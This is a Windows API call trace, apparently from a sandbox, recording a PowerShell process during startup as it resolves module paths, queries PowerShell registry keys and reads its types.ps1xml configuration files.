	[0146.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.008] GetLastError () returned 0x3
	[0146.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.008] GetLastError () returned 0x3
	[0146.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.008] GetLastError () returned 0x3
	[0146.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.008] GetLastError () returned 0x3
	[0146.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.008] GetLastError () returned 0x3
	[0146.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.008] GetLastError () returned 0x3
	[0146.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.008] GetLastError () returned 0x3
	[0146.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.008] GetLastError () returned 0x3
	[0146.222] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0146.222] GetLastError () returned 0x3
	[0146.440] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x337c48, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0146.440] GetLastError () returned 0x3
	[0146.441] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xceb80 | out: phkResult=0xceb80*=0x304) returned 0x0
	[0146.441] RegQueryValueExW (in: hKey=0x304, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcebc4, lpData=0x0, lpcbData=0xcebc0*=0x0 | out: lpType=0xcebc4*=0x2, lpData=0x0, lpcbData=0xcebc0*=0x6c) returned 0x0
	[0146.704] RegQueryValueExW (in: hKey=0x304, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcebc4, lpData=0x337c48, lpcbData=0xcebc0*=0x6c | out: lpType=0xcebc4*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xcebc0*=0x6c) returned 0x0
	[0146.704] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x337c48, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0146.704] GetLastError () returned 0x3
	[0146.704] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x337c48, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0146.704] GetLastError () returned 0x3
	[0146.705] RegCloseKey (hKey=0x304) returned 0x0
	[0146.705] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x337c48, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0146.705] GetLastError () returned 0x3
	[0146.705] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xceb80 | out: phkResult=0xceb80*=0x304) returned 0x0
	[0146.705] RegQueryValueExW (in: hKey=0x304, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcebc4, lpData=0x0, lpcbData=0xcebc0*=0x0 | out: lpType=0xcebc4*=0x0, lpData=0x0, lpcbData=0xcebc0*=0x0) returned 0x2
	[0146.706] RegCloseKey (hKey=0x304) returned 0x0
	[0146.715] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x337c48 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0146.717] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xce6e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0146.717] GetLastError () returned 0x3f0
	[0146.860] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0146.860] GetLastError () returned 0x3f0
	[0146.979] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.979] GetLastError () returned 0xcb
	[0146.981] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.981] GetLastError () returned 0xcb
	[0147.297] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.297] GetLastError () returned 0xcb
	[0147.297] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.297] GetLastError () returned 0xcb
	[0147.305] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xceb00 | out: phkResult=0xceb00*=0x34c) returned 0x0
	[0147.447] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0xceb68, lpData=0x0, lpcbData=0xceb64*=0x0 | out: lpType=0xceb68*=0x1, lpData=0x0, lpcbData=0xceb64*=0x74) returned 0x0
	[0147.449] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0xceb48, lpData=0x0, lpcbData=0xceb44*=0x0 | out: lpType=0xceb48*=0x1, lpData=0x0, lpcbData=0xceb44*=0x74) returned 0x0
	[0147.449] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0xceb48, lpData=0x337c48, lpcbData=0xceb44*=0x74 | out: lpType=0xceb48*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xceb44*=0x74) returned 0x0
	[0147.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xce6c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0147.449] GetLastError () returned 0xcb
	[0147.449] SetErrorMode (uMode=0x1) returned 0x1
	[0147.449] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xceb48 | out: lpFileInformation=0xceb48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0147.449] GetLastError () returned 0xcb
	[0147.449] SetErrorMode (uMode=0x1) returned 0x1
	[0147.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xce6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0147.719] GetLastError () returned 0xcb
	[0147.719] SetErrorMode (uMode=0x1) returned 0x1
	[0147.719] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xceb3c | out: lpFileInformation=0xceb3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0147.720] GetLastError () returned 0xcb
	[0147.720] SetErrorMode (uMode=0x1) returned 0x1
	[0147.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xce6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0147.724] GetLastError () returned 0xcb
	[0147.724] SetErrorMode (uMode=0x1) returned 0x1
	[0147.724] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xceb3c | out: lpFileInformation=0xceb3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0147.724] GetLastError () returned 0xcb
	[0147.724] SetErrorMode (uMode=0x1) returned 0x1
	[0147.731] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.731] GetLastError () returned 0xcb
	[0147.733] GetACP () returned 0x4e4
	[0148.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xce54c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0148.165] GetLastError () returned 0xcb
	[0148.165] SetErrorMode (uMode=0x1) returned 0x1
	[0148.167] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x350
	[0148.167] GetLastError () returned 0x0
	[0148.169] GetFileType (hFile=0x350) returned 0x1
	[0148.169] SetErrorMode (uMode=0x1) returned 0x1
	[0148.169] GetFileType (hFile=0x350) returned 0x1
	[0148.219] ReadFile (in: hFile=0x350, lpBuffer=0x2b7b494, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2b7b494*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0148.219] GetLastError () returned 0x0
	[0148.220] ReadFile (in: hFile=0x350, lpBuffer=0x2b7b494, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2b7b494*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0148.220] GetLastError () returned 0x0
	[0148.221] ReadFile (in: hFile=0x350, lpBuffer=0x2b7b494, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2b7b494*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0148.221] GetLastError () returned 0x0
	[0148.221] ReadFile (in: hFile=0x350, lpBuffer=0x2b7b494, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2b7b494*, lpNumberOfBytesRead=0xceab4*=0xcf3, lpOverlapped=0x0) returned 1
	[0148.221] GetLastError () returned 0x0
	[0148.222] ReadFile (in: hFile=0x350, lpBuffer=0x2b7a927, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2b7a927*, lpNumberOfBytesRead=0xceab4*=0x0, lpOverlapped=0x0) returned 1
	[0148.222] GetLastError () returned 0x0
	[0148.222] ReadFile (in: hFile=0x350, lpBuffer=0x2b7b494, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2b7b494*, lpNumberOfBytesRead=0xceab4*=0x0, lpOverlapped=0x0) returned 1
	[0148.222] GetLastError () returned 0x0
	[0148.222] CloseHandle (hObject=0x350) returned 1
	[0148.222] GetLastError () returned 0x0
	[0148.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xce614, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0148.224] GetLastError () returned 0x0
	[0148.224] SetErrorMode (uMode=0x1) returned 0x1
	[0148.224] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2b8c808 | out: lpFileInformation=0x2b8c808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0148.224] GetLastError () returned 0x0
	[0148.224] SetErrorMode (uMode=0x1) returned 0x1
	[0148.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xce5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0148.466] GetLastError () returned 0x0
	[0148.467] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcea38 | out: phkResult=0xcea38*=0x350) returned 0x0
	[0148.467] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcea80, lpData=0x0, lpcbData=0xcea7c*=0x0 | out: lpType=0xcea80*=0x1, lpData=0x0, lpcbData=0xcea7c*=0x56) returned 0x0
	[0148.467] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcea80, lpData=0x337c48, lpcbData=0xcea7c*=0x56 | out: lpType=0xcea80*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xcea7c*=0x56) returned 0x0
	[0148.468] RegCloseKey (hKey=0x350) returned 0x0
	[0148.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xce5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0148.468] GetLastError () returned 0x0
	[0148.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xce574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0148.468] GetLastError () returned 0x0
	[0151.225] GetSystemInfo (in: lpSystemInfo=0xce1b8 | out: lpSystemInfo=0xce1b8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0151.226] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0151.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xce54c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0151.992] GetLastError () returned 0x0
	[0151.992] SetErrorMode (uMode=0x1) returned 0x1
	[0151.992] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x350
	[0151.992] GetLastError () returned 0x0
	[0151.992] GetFileType (hFile=0x350) returned 0x1
	[0151.992] SetErrorMode (uMode=0x1) returned 0x1
	[0151.992] GetFileType (hFile=0x350) returned 0x1
	[0151.993] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0151.993] GetLastError () returned 0x0
	[0151.993] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0151.993] GetLastError () returned 0x0
	[0151.994] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0151.994] GetLastError () returned 0x0
	[0151.994] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0151.994] GetLastError () returned 0x0
	[0151.994] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0151.995] GetLastError () returned 0x0
	[0151.996] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0151.996] GetLastError () returned 0x0
	[0151.996] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0151.996] GetLastError () returned 0x0
	[0151.996] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0151.996] GetLastError () returned 0x0
	[0151.996] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0151.996] GetLastError () returned 0x0
	[0151.997] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0151.998] GetLastError () returned 0x0
	[0151.998] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0151.998] GetLastError () returned 0x0
	[0151.998] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0151.998] GetLastError () returned 0x0
	[0151.998] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0151.998] GetLastError () returned 0x0
	[0151.998] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0151.998] GetLastError () returned 0x0
	[0151.999] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0151.999] GetLastError () returned 0x0
	[0151.999] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0151.999] GetLastError () returned 0x0
	[0151.999] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0151.999] GetLastError () returned 0x0
	[0152.002] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.002] GetLastError () returned 0x0
	[0152.002] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.002] GetLastError () returned 0x0
	[0152.002] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.002] GetLastError () returned 0x0
	[0152.003] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.003] GetLastError () returned 0x0
	[0152.003] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.003] GetLastError () returned 0x0
	[0152.003] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.003] GetLastError () returned 0x0
